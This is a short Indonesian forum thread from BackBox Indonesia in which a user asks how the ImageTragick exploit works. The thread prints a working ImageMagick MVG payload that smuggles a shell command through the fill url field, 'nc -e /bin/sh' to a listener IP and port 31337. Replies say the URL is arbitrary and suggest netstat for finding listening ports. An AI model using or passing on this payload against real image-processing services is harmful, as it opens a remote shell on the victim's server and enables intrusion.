BackBox Indonesia

Full Version: [ASK] Tentang Exploit ImageTragick
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Code:
push graphic-context

viewbox 0 0 640 480

fill 'url(https://127.0.0.0/ipinganteng.jpg" | nc -e /bin/sh 192.168.1.226 "31337)'

pop graphic-context

"fill 'url(https://127.0.0.0/oops.jpg)"  ini ip/url target atau apa ?

dan bagaimana caranya mengetahui port dan ip yg sedang listening, contoh "192.168.1.226 31337"
itu sebenernya fake url, bisa di ganti sama apa aja.
buat mengatahui port yang lising bisa pake perintah netstat